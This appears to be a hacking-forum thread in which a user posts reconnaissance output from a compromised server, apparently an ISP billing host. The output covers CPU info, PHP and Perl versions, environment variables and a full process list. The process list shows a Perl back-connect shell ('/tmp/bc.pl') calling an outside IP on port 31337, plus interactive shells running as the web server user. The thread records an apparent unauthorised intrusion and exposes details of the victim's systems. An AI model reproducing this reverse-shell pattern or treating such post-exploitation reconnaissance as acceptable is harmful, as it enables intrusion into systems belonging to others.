    clflush size	: 64
    cache_alignment	: 64
    address sizes	: 36 bits physical, 48 bits virtual
    power management:
    
    processor	: 1
    vendor_id	: GenuineIntel
    cpu family	: 6
    model		: 23
    model name	: Intel(R) Core(TM)2 Quad CPU    Q8200  @ 2.33GHz
    stepping	: 10
    cpu MHz		: 2333.246
    cache size	: 2048 KB
    physical id	: 0
    siblings	: 4
    core id		: 1
    cpu cores	: 4
    apicid		: 1
    initial apicid	: 1
    fpu		: yes
    fpu_exception	: yes
    cpuid level	: 13
    wp		: yes
    flags		: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx lm constant_tsc arch_perfmon pebs bts rep_good pni dtes64 monitor ds_cpl est tm2 ssse3 cx16 xtpr pdcm sse4_1 xsave lahf_lm
    bogomips	: 4665.95
    clflush size	: 64
    cache_alignment	: 64
    address sizes	: 36 bits physical, 48 bits virtual
    power management:
    processor	: 2
    vendor_id	: GenuineIntel
    cpu family	: 6
    model		: 23
    model name	: Intel(R) Core(TM)2 Quad CPU    Q8200  @ 2.33GHz
    stepping	: 10
    cpu MHz		: 2333.246
    cache size	: 2048 KB
    physical id	: 0
    siblings	: 4
    core id		: 2
    cpu cores	: 4
    apicid		: 2
    initial apicid	: 2
    fpu		: yes
    fpu_exception	: yes
    cpuid level	: 13
    wp		: yes
    flags		: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx lm constant_tsc arch_perfmon pebs bts rep_good pni dtes64 monitor ds_cpl est tm2 ssse3 cx16 xtpr pdcm sse4_1 xsave lahf_lm
    bogomips	: 4665.97
    clflush size	: 64
    cache_alignment	: 64
    address sizes	: 36 bits physical, 48 bits virtual
    power management:
    
    processor	: 3
    vendor_id	: GenuineIntel
    cpu family	: 6
    model		: 23
    model name	: Intel(R) Core(TM)2 Quad CPU    Q8200  @ 2.33GHz
    stepping	: 10
    cpu MHz		: 2333.246
    cache size	: 2048 KB
    physical id	: 0
    siblings	: 4
    core id		: 3
    cpu cores	: 4
    apicid		: 3
    initial apicid	: 3
    fpu		: yes
    fpu_exception	: yes
    cpuid level	: 13
    wp		: yes
    flags		: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx lm constant_tsc arch_perfmon pebs bts rep_good pni dtes64 monitor ds_cpl est tm2 ssse3 cx16 xtpr pdcm sse4_1 xsave lahf_lm
    bogomips	: 4665.97
    clflush size	: 64
    cache_alignment	: 64
    address sizes	: 36 bits physical, 48 bits virtual
    power management:
    
     
    #451 Pirotexnik, 2 Jan 2013
    Last edited: 2 Jan 2013
  12. Pirotexnik

    Pirotexnik Member

    Joined:
    13 Oct 2010
    Messages:
    376
    Likes Received:
    73
    Reputations:
    38
    Code:
    ================================================[b][COLOR=Red]ls -la /libexec[/b][/COLOR]================================================
    ================================================[b][COLOR=Red]php -v[/b][/COLOR]================================================
    PHP 5.3.4 with Suhosin-Patch (cli) (built: Dec 15 2010 04:28:25) 
    Copyright (c) 1997-2009 The PHP Group
    Zend Engine v2.3.0, Copyright (c) 1998-2012 Zend Technologies
        with the ionCube PHP Loader v4.0.12, Copyright (c) 2002-2011, by ionCube Ltd.
        with Suhosin v0.9.29, Copyright (c) 2007, by SektionEins GmbH
    ================================================[b][COLOR=Red]perl -v[/b][/COLOR]================================================
    
    This is perl, v5.10.1 (*) built for x86_64-linux-thread-multi
    (with 1 registered patch, see perl -V for more detail)
    
    Copyright 1987-2009, Larry Wall
    
    Perl may be copied only under the terms of either the Artistic License or the
    GNU General Public License, which may be found in the Perl 5 source kit.
    
    Complete documentation for Perl, including FAQ lists, should be found on
    this system using "man perl" or "perldoc perl".  If you have access to the
    Internet, point your browser at http://www.perl.org/, the Perl Home Page.
    
    ================================================[b][COLOR=Red]ls -la /usr/sbin/wicd[/b][/COLOR]================================================
    ================================================[b][COLOR=Red]env[/b][/COLOR]================================================
    TMPDIR=/tmp
    LOCPATH=/etc/locale
    LC_ALL=C
    PATH=/sbin:/usr/sbin:/bin:/usr/bin
    PWD=/var/www/billinfo/18/admin/users_reports
    LANG=C
    SHLVL=3
    TMP=/tmp
    LC_CTYPE=C
    TEXTDOMAINDIR=/etc/locale
    _=/bin/env
    ================================================[b][COLOR=Red]ps -aux[/b][/COLOR]================================================
    USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
    root         1  0.0  0.0   3908   624 ?        Ss    2012   0:19 init [3]                                                                                                                                                          
    root         2  0.0  0.0      0     0 ?        S<    2012   0:00 [kthreadd]
    root         3  0.0  0.0      0     0 ?        S<    2012   0:08 [migration/0]
    root         4  0.0  0.0      0     0 ?        S<    2012   0:00 [ksoftirqd/0]
    root         5  0.0  0.0      0     0 ?        S<    2012   0:00 [watchdog/0]
    root         6  0.0  0.0      0     0 ?        S<    2012   1:51 [migration/1]
    root         7  0.0  0.0      0     0 ?        S<    2012   0:03 [ksoftirqd/1]
    root         8  0.0  0.0      0     0 ?        S<    2012   0:00 [watchdog/1]
    root         9  0.0  0.0      0     0 ?        S<    2012   0:07 [migration/2]
    root        10  0.0  0.0      0     0 ?        S<    2012   0:02 [ksoftirqd/2]
    root        11  0.0  0.0      0     0 ?        S<    2012   0:00 [watchdog/2]
    root        12  0.0  0.0      0     0 ?        S<    2012   7:17 [migration/3]
    root        13  0.0  0.0      0     0 ?        S<    2012   0:43 [ksoftirqd/3]
    root        14  0.0  0.0      0     0 ?        S<    2012   0:00 [watchdog/3]
    root        15  0.0  0.0      0     0 ?        S<    2012   0:00 [events/0]
    root        16  0.0  0.0      0     0 ?        S<    2012   0:08 [events/1]
    root        17  0.0  0.0      0     0 ?        S<    2012   0:08 [events/2]
    root        18  0.0  0.0      0     0 ?        S<    2012   0:09 [events/3]
    root        19  0.0  0.0      0     0 ?        S<    2012   0:00 [khelper]
    root        20  0.0  0.0      0     0 ?        S<    2012   0:00 [async/mgr]
    root        21  0.0  0.0      0     0 ?        S<    2012   0:00 [kintegrityd/0]
    root        22  0.0  0.0      0     0 ?        S<    2012   0:00 [kintegrityd/1]
    root        23  0.0  0.0      0     0 ?        S<    2012   0:00 [kintegrityd/2]
    root        24  0.0  0.0      0     0 ?        S<    2012   0:00 [kintegrityd/3]
    root        25  0.0  0.0      0     0 ?        S<    2012   0:02 [kblockd/0]
    root        26  0.0  0.0      0     0 ?        S<    2012   0:06 [kblockd/1]
    root        27  0.0  0.0      0     0 ?        S<    2012   0:06 [kblockd/2]
    root        28  0.0  0.0      0     0 ?        S<    2012   0:06 [kblockd/3]
    root        29  0.0  0.0      0     0 ?        S<    2012   0:00 [kacpid]
    root        30  0.0  0.0      0     0 ?        S<    2012   0:00 [kacpi_notify]
    root        31  0.0  0.0      0     0 ?        S<    2012   0:00 [kacpi_hotplug]
    root        32  0.0  0.0      0     0 ?        S<    2012   0:00 [kseriod]
    root        33  0.0  0.0      0     0 ?        S     2012   0:00 [khungtaskd]
    root        36  0.0  0.0      0     0 ?        S<    2012   1:45 [kswapd0]
    root        37  0.0  0.0      0     0 ?        S<    2012   0:00 [aio/0]
    root        38  0.0  0.0      0     0 ?        S<    2012   0:00 [aio/1]
    root        39  0.0  0.0      0     0 ?        S<    2012   0:00 [aio/2]
    root        40  0.0  0.0      0     0 ?        S<    2012   0:00 [aio/3]
    root        41  0.0  0.0      0     0 ?        S<    2012   0:00 [crypto/0]
    root        42  0.0  0.0      0     0 ?        S<    2012   0:00 [crypto/1]
    root        43  0.0  0.0      0     0 ?        S<    2012   0:00 [crypto/2]
    root        44  0.0  0.0      0     0 ?        S<    2012   0:00 [crypto/3]
    root        48  0.0  0.0      0     0 ?        S<    2012   0:00 [kpsmoused]
    root        61  0.1  0.0      0     0 ?        S<    2012  55:12 [i915/0]
    root        62  0.1  0.0      0     0 ?        S<    2012  69:22 [i915/1]
    root        63  0.1  0.0      0     0 ?        S<    2012  74:41 [i915/2]
    root        64  0.1  0.0      0     0 ?        S<    2012  78:51 [i915/3]
    root        75  0.0  0.0      0     0 ?        S<    2012   0:00 [ata/0]
    root        76  0.0  0.0      0     0 ?        S<    2012   0:00 [ata/1]
    root        77  0.0  0.0      0     0 ?        S<    2012   0:00 [ata/2]
    root        78  0.0  0.0      0     0 ?        S<    2012   0:00 [ata/3]
    root        79  0.0  0.0      0     0 ?        S<    2012   0:00 [ata_aux]
    root        82  0.0  0.0      0     0 ?        S<    2012   0:00 [scsi_eh_0]
    root        83  0.0  0.0      0     0 ?        S<    2012   0:00 [scsi_eh_1]
    root        84  0.0  0.0      0     0 ?        S<    2012   0:00 [scsi_eh_2]
    root        85  0.0  0.0      0     0 ?        S<    2012   0:00 [scsi_eh_3]
    root        86  0.0  0.0      0     0 ?        S<    2012   0:38 [scsi_eh_4]
    root        87  0.0  0.0      0     0 ?        S<    2012   0:00 [scsi_eh_5]
    root        97  0.0  0.0      0     0 ?        S<    2012  41:07 [kjournald2]
    root        98  0.0  0.0      0     0 ?        S<    2012   0:00 [ext4-dio-unwrit]
    root        99  0.0  0.0      0     0 ?        S<    2012   0:00 [ext4-dio-unwrit]
    root       100  0.0  0.0      0     0 ?        S<    2012   0:00 [ext4-dio-unwrit]
    root       101  0.0  0.0      0     0 ?        S<    2012   0:00 [ext4-dio-unwrit]
    root       117  0.0  0.0      0     0 ?        S<    2012   0:00 [ksuspend_usbd]
    root       118  0.0  0.0      0     0 ?        S<    2012   0:00 [khubd]
    root       122  0.0  0.0      0     0 ?        S<    2012   0:00 [kauditd]
    root       209  1.8  0.0   6508   944 ?        S<s   2012 848:02 /sbin/udevd -d
    root       454  0.0  0.0      0     0 ?        S<    2012   0:00 [hd-audio0]
    root       497  0.0  0.0      0     0 ?        S<    2012   0:00 [kconservative/0]
    
    Code:
    root       498  0.0  0.0      0     0 ?        S<    2012   0:00 [kconservative/1]
    root       499  0.0  0.0      0     0 ?        S<    2012   0:00 [kconservative/2]
    root       500  0.0  0.0      0     0 ?        S<    2012   0:00 [kconservative/3]
    root       501  0.0  0.0      0     0 ?        S<    2012   0:00 [kondemand/0]
    root       502  0.0  0.0      0     0 ?        S<    2012   0:00 [kondemand/1]
    root       503  0.0  0.0      0     0 ?        S<    2012   0:00 [kondemand/2]
    root       504  0.0  0.0      0     0 ?        S<    2012   0:00 [kondemand/3]
    root       541  0.0  0.0      0     0 ?        S<    2012   0:00 [kstriped]
    root       590  0.0  0.0      0     0 ?        S<    2012   5:49 [kjournald2]
    root       591  0.0  0.0      0     0 ?        S<    2012   0:00 [ext4-dio-unwrit]
    root       592  0.0  0.0      0     0 ?        S<    2012   0:00 [ext4-dio-unwrit]
    root       593  0.0  0.0      0     0 ?        S<    2012   0:00 [ext4-dio-unwrit]
    root       594  0.0  0.0      0     0 ?        S<    2012   0:00 [ext4-dio-unwrit]
    root       613  5.7  0.0   6512   648 ?        S<    2012 2580:04 /sbin/udevd -d
    root       615  0.0  0.0   6512   640 ?        S<    2012   0:00 /sbin/udevd -d
    root       993  0.0  0.0   6008   656 ?        Ss    2012  11:02 syslogd -m 0
    root      1004  0.0  0.0   3904   456 ?        Ss    2012   0:00 /usr/sbin/acpid
    root      1047  0.0  0.0   3904   448 ?        Ss    2012   0:00 klogd -x
    root      1135  0.0  0.0  14784   680 ?        Ss    2012   0:21 crond
    daemon    1139  0.0  0.0  12312   276 ?        Ss    2012   0:00 /usr/sbin/atd -l 3.8
    root      1175  0.0  0.0  38844   556 ?        S<sl  2012   0:00 auditd
    root      1177  0.0  0.0  79864   640 ?        S<sl  2012   0:00 /sbin/audispd
    apache    1205  0.0  1.2 387404 50944 ?        S    04:30   0:17 /usr/sbin/httpd -f /etc/httpd/conf/httpd.conf -DAPACHE2 -DHAVE_PERL -DHAVE_PHP5 -DHAVE_RANDOM -DHAVE_ACTIONS -DHAVE_ALIAS -DHAVE_ASIS -DHAVE_AUTH_BASIC -DHAVE_AUTH_DIGEST -DHAVE_AUTHN_ALIAS -DHAVE_AUTHN_ANON -DHAVE_AUTHN_DBM -DHAVE_AUTHN_DEFAULT -DHAVE_AUTHN_FILE -DHAVE_AUTHZ_DBM -DHAVE_AUTHZ_DEFAULT -DHAVE_AUTHZ_GROUPFILE -DHAVE_AUTHZ_HOST -DHAVE_AUTHZ_OWNER -DHAVE_AUTHZ_USER -DHAVE_AUTOINDEX -DHAVE_BUCKETEER -DHAVE_CASE_FILTER -DHAVE_CASE_FILTER_IN -DHAVE_CERN_META -DHAVE_CGI -DHAVE_CGID -DHAVE_CHARSET_LITE -DHAVE_DIR -DHAVE_DUMPIO -DHAVE_ECHO -DHAVE_ENV -DHAVE_EXAMPLE -DHAVE_EXPIRES -DHAVE_EXT_FILTER -DHAVE_FILTER -DHAVE_HEADERS -DHAVE_IDENT -DHAVE_IMAGEMAP -DHAVE_INCLUDE -DHAVE_INFO -DHAVE_LOG_CONFIG -DHAVE_LOG_FORENSIC -DHAVE_LOGIO -DHAVE_MIME -DHAVE_MIME_MAGIC -DHAVE_NEGOTIATION -DHAVE_OPTIONAL_FN_EXPORT -DHAVE_OPTIONAL_FN_IMPORT -DHAVE_OPTIONAL_HOOK_EXPORT -DHAVE_OPTIONAL_HOOK_IMPORT -DHAVE_REWRITE -DHAVE_SETENVIF -DHAVE_SPELING -DHAVE_STATUS -DHAVE_SUBSTITUTE -DHAVE_SUEXEC -DHAVE_UNIQUE_ID -DHAVE_USERTRACK -DHAVE_VERSION -DHAVE_VHOST_ALIAS
    apache    1226  0.0  1.2 387864 49228 ?        S    04:30   0:17 /usr/sbin/httpd -f /etc/httpd/conf/httpd.conf -DAPACHE2 -DHAVE_PERL -DHAVE_PHP5 -DHAVE_RANDOM -DHAVE_ACTIONS -DHAVE_ALIAS -DHAVE_ASIS -DHAVE_AUTH_BASIC -DHAVE_AUTH_DIGEST -DHAVE_AUTHN_ALIAS -DHAVE_AUTHN_ANON -DHAVE_AUTHN_DBM -DHAVE_AUTHN_DEFAULT -DHAVE_AUTHN_FILE -DHAVE_AUTHZ_DBM -DHAVE_AUTHZ_DEFAULT -DHAVE_AUTHZ_GROUPFILE -DHAVE_AUTHZ_HOST -DHAVE_AUTHZ_OWNER -DHAVE_AUTHZ_USER -DHAVE_AUTOINDEX -DHAVE_BUCKETEER -DHAVE_CASE_FILTER -DHAVE_CASE_FILTER_IN -DHAVE_CERN_META -DHAVE_CGI -DHAVE_CGID -DHAVE_CHARSET_LITE -DHAVE_DIR -DHAVE_DUMPIO -DHAVE_ECHO -DHAVE_ENV -DHAVE_EXAMPLE -DHAVE_EXPIRES -DHAVE_EXT_FILTER -DHAVE_FILTER -DHAVE_HEADERS -DHAVE_IDENT -DHAVE_IMAGEMAP -DHAVE_INCLUDE -DHAVE_INFO -DHAVE_LOG_CONFIG -DHAVE_LOG_FORENSIC -DHAVE_LOGIO -DHAVE_MIME -DHAVE_MIME_MAGIC -DHAVE_NEGOTIATION -DHAVE_OPTIONAL_FN_EXPORT -DHAVE_OPTIONAL_FN_IMPORT -DHAVE_OPTIONAL_HOOK_EXPORT -DHAVE_OPTIONAL_HOOK_IMPORT -DHAVE_REWRITE -DHAVE_SETENVIF -DHAVE_SPELING -DHAVE_STATUS -DHAVE_SUBSTITUTE -DHAVE_SUEXEC -DHAVE_UNIQUE_ID -DHAVE_USERTRACK -DHAVE_VERSION -DHAVE_VHOST_ALIAS
    apache    1227  0.0  1.1 381928 45368 ?        S    04:30   0:13 /usr/sbin/httpd -f /etc/httpd/conf/httpd.conf -DAPACHE2 -DHAVE_PERL -DHAVE_PHP5 -DHAVE_RANDOM -DHAVE_ACTIONS -DHAVE_ALIAS -DHAVE_ASIS -DHAVE_AUTH_BASIC -DHAVE_AUTH_DIGEST -DHAVE_AUTHN_ALIAS -DHAVE_AUTHN_ANON -DHAVE_AUTHN_DBM -DHAVE_AUTHN_DEFAULT -DHAVE_AUTHN_FILE -DHAVE_AUTHZ_DBM -DHAVE_AUTHZ_DEFAULT -DHAVE_AUTHZ_GROUPFILE -DHAVE_AUTHZ_HOST -DHAVE_AUTHZ_OWNER -DHAVE_AUTHZ_USER -DHAVE_AUTOINDEX -DHAVE_BUCKETEER -DHAVE_CASE_FILTER -DHAVE_CASE_FILTER_IN -DHAVE_CERN_META -DHAVE_CGI -DHAVE_CGID -DHAVE_CHARSET_LITE -DHAVE_DIR -DHAVE_DUMPIO -DHAVE_ECHO -DHAVE_ENV -DHAVE_EXAMPLE -DHAVE_EXPIRES -DHAVE_EXT_FILTER -DHAVE_FILTER -DHAVE_HEADERS -DHAVE_IDENT -DHAVE_IMAGEMAP -DHAVE_INCLUDE -DHAVE_INFO -DHAVE_LOG_CONFIG -DHAVE_LOG_FORENSIC -DHAVE_LOGIO -DHAVE_MIME -DHAVE_MIME_MAGIC -DHAVE_NEGOTIATION -DHAVE_OPTIONAL_FN_EXPORT -DHAVE_OPTIONAL_FN_IMPORT -DHAVE_OPTIONAL_HOOK_EXPORT -DHAVE_OPTIONAL_HOOK_IMPORT -DHAVE_REWRITE -DHAVE_SETENVIF -DHAVE_SPELING -DHAVE_STATUS -DHAVE_SUBSTITUTE -DHAVE_SUEXEC -DHAVE_UNIQUE_ID -DHAVE_USERTRACK -DHAVE_VERSION -DHAVE_VHOST_ALIAS
    13        1304  0.0  0.0  10784   700 ?        Ss    2012   0:00 dbus-daemon --system
    root      1336  0.0  0.0  12016   696 ?        S     2012   0:02 /usr/sbin/smartd
    18        1367  0.4  0.0  32320  1680 ?        Ss    2012 214:06 hald
    root      1394  0.0  0.0 2079864  984 ?        Ssl   2012   0:00 /usr/sbin/console-kit-daemon
    root      1395  0.0  0.0  20016   604 ?        S     2012   0:00 hald-runner
    root      1554  0.0  0.0  22140   556 ?        S     2012   0:00 hald-addon-input: Listening on /dev/input/event3 /dev/input/event2 /dev/input/event1
    18        1556  0.0  0.0  19724   608 ?        S     2012   0:00 hald-addon-acpi: listening on acpid socket /var/run/acpid.socket
    root      1558  0.0  0.0  22136   636 ?        S     2012   0:22 hald-addon-storage: polling /dev/sr0 (every 16 sec)
    root      1810  0.0  0.0  89052   460 ?        Ssl   2012   0:00 pcscd
    root      1815  0.0  0.0   5364   328 ?        S     2012   0:00 /usr/sbin/hddtemp -d -l 127.0.0.1 /dev/hda
    rpc       1836  0.0  0.0  14544   456 ?        Ss    2012   0:00 rpcbind -i
    avahi     1862  0.0  0.0  25528   984 ?        Ss    2012   0:00 avahi-daemon: running [billing.local]
    avahi     1864  0.0  0.0  25404   228 ?        Ss    2012   0:00 avahi-daemon: chroot helper
    root      1903  0.0  0.0  38812   412 ?        Ss    2012   0:00 saslauthd -a pam
    root      1959  0.0  0.0  42940   652 ?        Ss    2012   0:02 /usr/sbin/sshd
    root      2082  0.0  0.0  38812   104 ?        S     2012   0:00 saslauthd -a pam
    root      2083  0.0  0.0  38812    92 ?        S     2012   0:00 saslauthd -a pam
    root      2084  0.0  0.0  38812    92 ?        S     2012   0:00 saslauthd -a pam
    root      2085  0.0  0.0  38812    92 ?        S     2012   0:00 saslauthd -a pam
    root      2131  0.0  0.0   9696   108 ?        Ss    2012   4:42 php-fpm: master process (/etc/php-fpm.conf)
    apache    2141  0.0  0.0   9692    72 ?        S     2012   0:00 php-fpm: pool www
    apache    2142  0.0  0.0   9692    72 ?        S     2012   0:00 php-fpm: pool www
    apache    2143  0.0  0.0   9692    72 ?        S     2012   0:00 php-fpm: pool www
    apache    2144  0.0  0.0   9692    72 ?        S     2012   0:00 php-fpm: pool www
    apache    2145  0.0  0.0   9692    72 ?        S     2012   0:00 php-fpm: pool www
    apache    2146  0.0  0.0   9692    72 ?        S     2012   0:00 php-fpm: pool www
    apache    2147  0.0  0.0   9692    72 ?        S     2012   0:00 php-fpm: pool www
    apache    2148  0.0  0.0   9692    72 ?        S     2012   0:00 php-fpm: pool www
    apache    2149  0.0  0.0   9692    72 ?        S     2012   0:00 php-fpm: pool www
    apache    2150  0.0  0.0   9692    72 ?        S     2012   0:00 php-fpm: pool www
    apache    2151  0.0  0.0   9692    72 ?        S     2012   0:00 php-fpm: pool www
    apache    2152  0.0  0.0   9692    72 ?        S     2012   0:00 php-fpm: pool www
    apache    2153  0.0  0.0   9692    72 ?        S     2012   0:00 php-fpm: pool www
    apache    2154  0.0  0.0   9692    72 ?        S     2012   0:00 php-fpm: pool www
    apache    2155  0.0  0.0   9692    72 ?        S     2012   0:00 php-fpm: pool www
    apache    2156  0.0  0.0   9692    72 ?        S     2012   0:00 php-fpm: pool www
    apache    2157  0.0  0.0   9692    72 ?        S     2012   0:00 php-fpm: pool www
    apache    2158  0.0  0.0   9692    72 ?        S     2012   0:00 php-fpm: pool www
    apache    2159  0.0  0.0   9692    72 ?        S     2012   0:00 php-fpm: pool www
    apache    2160  0.0  0.0   9692    72 ?        S     2012   0:00 php-fpm: pool www
    root      2163  0.0  0.0  50580  1752 ?        S     2012   5:04 /usr/sbin/snmpd -Lsd -Lf /dev/null -p /var/run/snmpd -a -I -lmSensors
    root      2237  0.0  0.9 148868 36508 ?        Sl    2012  14:31 /usr/local/billing/LBccd-S16 -c /etc/netflow.sold16.conf -L /usr/local/billing/log/netflow_sold16.log
    named     2272  1.3  3.1 454588 126592 ?       Ssl   2012 586:08 named -u named -t /var/lib/named
    nobody    2286  0.0  0.0  29472  1324 ?        Ss    2012   0:29 proftpd: (accepting connections)
    root      2299  0.0  0.0  81452  1780 ?        Ss    2012   0:43 /usr/bin/perl /usr/libexec/webmin/miniserv.pl /etc/webmin/miniserv.conf
    ntp       2505  0.0  0.0  21876  1016 ?        Ss    2012   1:46 ntpd -u ntp:ntp -p /var/run/ntpd.pid -g
    root      2534  0.0  0.0   3892   452 tty1     Ss+   2012   0:00 /sbin/mingetty tty1
    root      2536  0.0  0.0   3892   452 tty2     Ss+   2012   0:00 /sbin/mingetty tty2
    root      2537  0.0  0.0   3892   452 tty3     Ss+   2012   0:00 /sbin/mingetty tty3
    root      2538  0.0  0.0   3892   452 tty4     Ss+   2012   0:00 /sbin/mingetty tty4
    root      2539  0.0  0.0   3892   452 tty5     Ss+   2012   0:00 /sbin/mingetty tty5
    root      2541  0.0  0.0   3892   452 tty6     Ss+   2012   0:00 /sbin/mingetty tty6
    apache    3083  0.0  1.4 396176 57608 ?        S    Jan01   0:46 /usr/sbin/httpd -f /etc/httpd/conf/httpd.conf -DAPACHE2 -DHAVE_PERL -DHAVE_PHP5 -DHAVE_RANDOM -DHAVE_ACTIONS -DHAVE_ALIAS -DHAVE_ASIS -DHAVE_AUTH_BASIC -DHAVE_AUTH_DIGEST -DHAVE_AUTHN_ALIAS -DHAVE_AUTHN_ANON -DHAVE_AUTHN_DBM -DHAVE_AUTHN_DEFAULT -DHAVE_AUTHN_FILE -DHAVE_AUTHZ_DBM -DHAVE_AUTHZ_DEFAULT -DHAVE_AUTHZ_GROUPFILE -DHAVE_AUTHZ_HOST -DHAVE_AUTHZ_OWNER -DHAVE_AUTHZ_USER -DHAVE_AUTOINDEX -DHAVE_BUCKETEER -DHAVE_CASE_FILTER -DHAVE_CASE_FILTER_IN -DHAVE_CERN_META -DHAVE_CGI -DHAVE_CGID -DHAVE_CHARSET_LITE -DHAVE_DIR -DHAVE_DUMPIO -DHAVE_ECHO -DHAVE_ENV -DHAVE_EXAMPLE -DHAVE_EXPIRES -DHAVE_EXT_FILTER -DHAVE_FILTER -DHAVE_HEADERS -DHAVE_IDENT -DHAVE_IMAGEMAP -DHAVE_INCLUDE -DHAVE_INFO -DHAVE_LOG_CONFIG -DHAVE_LOG_FORENSIC -DHAVE_LOGIO -DHAVE_MIME -DHAVE_MIME_MAGIC -DHAVE_NEGOTIATION -DHAVE_OPTIONAL_FN_EXPORT -DHAVE_OPTIONAL_FN_IMPORT -DHAVE_OPTIONAL_HOOK_EXPORT -DHAVE_OPTIONAL_HOOK_IMPORT -DHAVE_REWRITE -DHAVE_SETENVIF -DHAVE_SPELING -DHAVE_STATUS -DHAVE_SUBSTITUTE -DHAVE_SUEXEC -DHAVE_UNIQUE_ID -DHAVE_USERTRACK -DHAVE_VERSION -DHAVE_VHOST_ALIAS
    root      3149  0.0  0.9 157000 36364 ?        Sl    2012  10:23 /usr/local/billing/LBccd_310 -c /etc/netflow.310.conf -L /usr/local/billing/log/netflow_310.log
    root      4049  0.0  0.9 157080 36512 ?        Sl    2012  20:42 /usr/local/billing/LBccd-Dz59 -c /etc/netflow.dz59.conf -L /usr/local/billing/log/netflow_dz59.log
    root      4158  0.0  0.1  56828  7404 ?        SN   12:02   0:03 sendmail: ./r01GOnui018547 hotmail.co.: user open
    root      4192  0.0  0.0  62992  1584 ?        Sl    2012   6:57 /usr/local/billing/LBstatd -c /etc/billing.server.conf -L /usr/local/billing/log/LBserver.log
    root      4790  0.0  0.9 157048 36568 ?        Sl    2012  15:59 /usr/local/billing/LBccd_leb9 -c /etc/netflow.leb9.conf -L /usr/local/billing/log/netflow_leb9.log
    apache    5197  0.0  0.0  25556  2716 ?        S    16:08   0:00 perl /tmp/bc.pl 92.112.57.199 31337
    apache    5215  0.0  0.0  11604  1868 ?        S    16:08   0:00 /bin/sh -i
    
     
  13. Pirotexnik

    Pirotexnik Member

    Joined:
    13 Oct 2010
    Messages:
    376
    Likes Received:
    73
    Reputations:
    38
    Code:
    root      5334  0.0  0.9 148852 36628 ?        Sl    2012  16:29 /usr/local/billing/LBccd-Shaiba -c /etc/netflow.shaiba.conf -L /usr/local/billing/log/netflow_shaiba.log
    root      6044  0.0  0.9 148868 36520 ?        Sl    2012  15:55 /usr/local/billing/LBccd_zvezda13 -c /etc/netflow.zvezda13.conf -L /usr/local/billing/log/netflow_zvezda13.log
    root      6282  0.7  0.0      0     0 ?        Z    16:09   0:00 [miniserv.pl] <defunct>
    root      6284  0.0  0.0  40172  1176 ?        S    16:10   0:00 CROND
    apache    6286  0.0  0.0   9312  1372 ?        Ss   16:10   0:00 /bin/sh -c     php /usr/share/cacti/poller.php > /dev/null 2>&1
    apache    6287  2.0  0.5 201368 20216 ?        S    16:10   0:00 php /usr/share/cacti/poller.php
    apache    6308  0.3  0.0  58200  1896 ?        S    16:10   0:00 /usr/bin/rrdtool -
    apache    6332  0.0  0.0  11632  1408 ?        S    16:10   0:00 /bin/sh -i
    apache    6359  0.0  0.0   8500   960 ?        R    16:10   0:00 ps -aux
    root      6814  0.0  0.1  57060  7688 ?        SN   06:02   0:14 sendmail: ./qBTMjijh007880 dfre.com.: user open
    mail      8211  0.0  0.0  39068  2204 ?        SN   16:02   0:00 sendmail: ./r01B8fmw003188 from queue               
    root      8212  0.0  0.1  56036  5756 ?        SN   16:02   0:00 sendmail: ./r029id2C007018 hormail.com.: user open
    root      8516  0.0  0.1  56912  7552 ?        SN   01:02   0:15 sendmail: ./qBSANbq4015205 hotmal.com.: user open
    root      9118  0.0  0.1  56848  7376 ?        SN   13:02   0:03 sendmail: ./r01G1txK007555 order.de.: user open
    root      9506  0.0  0.1  57144  7724 ?        SN   09:02   0:07 sendmail: ./qBVHjXxD002641 hotmai.com.: user open
    root     10757  0.0  0.0      0     0 ?        S     2012   1:14 [pdflush]
    root     12000  0.0  0.1  56948  7612 ?        SN   03:02   0:14 sendmail: ./qBT6aaQk010445 uol.com.: user open
    root     12172  0.0  0.1  57084  7688 ?        SN   10:02   0:06 sendmail: ./qBVLupM3016550 live.co.: user open
    root     13906  0.0  0.1  56964  7600 ?        SN   04:02   0:13 sendmail: ./qBTHwg5t024913 mail.co.: user open
    root     16454  0.0  0.0  47620  2476 ?        SNs   2012   0:24 sendmail: accepting connections     
    mail     16467  0.0  0.0  39024  1780 ?        SNs   2012   0:00 sendmail: Queue runner@01:00:00 for /var/spool/clientmqueue
    root     17704  0.0  0.0  45500  1512 ?        Ss    2012   0:01 sshd: oleg [priv]
    root     17744  0.0  0.1  56908  7444 ?        SN   14:02   0:02 sendmail: ./r01LDgoE017306 pop.dresssmall.com.: client greetin
    root     18319  0.0  0.0  29332   892 ?        Sl    2012   9:28 /usr/local/billing/LBctcd_tda600 -c /etc/billing.tda600com.conf -L /usr/local/billing/log/tda600com.log
    oleg     19201  0.0  0.0  45648  1088 ?        S     2012   0:05 sshd: oleg@pts/0 
    oleg     19208  0.0  0.0  17320  1140 pts/0    Ss    2012   0:00 -bash
    root     19524  0.0  0.0  47320   792 pts/0    S     2012   0:00 su
    root     19961  0.0  0.0  16816  1296 pts/0    S+    2012   0:00 bash
    root     21905  0.0  0.1  56940  7568 ?        SN   02:02   0:15 sendmail: ./qBS7k4IT019774 live.co.: user open
    root     23216  0.0  0.1  56852  7412 ?        SN   15:02   0:02 sendmail: ./r0202ok8012728 from queue
    root     23345  0.0  0.1  57096  7652 ?        SN   05:02   0:14 sendmail: ./qBTJPhY3001197 live.co.: user open
    root     24159  0.0  0.0      0     0 ?        S     2012   3:15 [pdflush]
    root     24541  0.0  0.1  56980  7648 ?        SN   07:02   0:10 sendmail: ./qBV1VKoh026301 trollmail.com.: user open
    root     25688  0.0  0.0  10456   880 ?        S     2012   0:00 /bin/sh /var/lib/mysql//bin/mysqld_safe --datadir=/var/lib/mysql//var --pid-file=/var/lib/mysql//var/billing.pid
    root     25798  0.0  1.0  69180 40376 ?        Ssl   2012   0:41 /usr/local/billing/LBarcd_cisco831 -c /etc/billing.cisco831.conf -L /usr/local/billing/log/rad_cisco831.log
    root     25799  0.0  1.0  78276 40864 ?        Sl    2012   1:53 /usr/local/billing/LBarcd_cisco831 -c /etc/billing.cisco831.conf -L /usr/local/billing/log/rad_cisco831.log
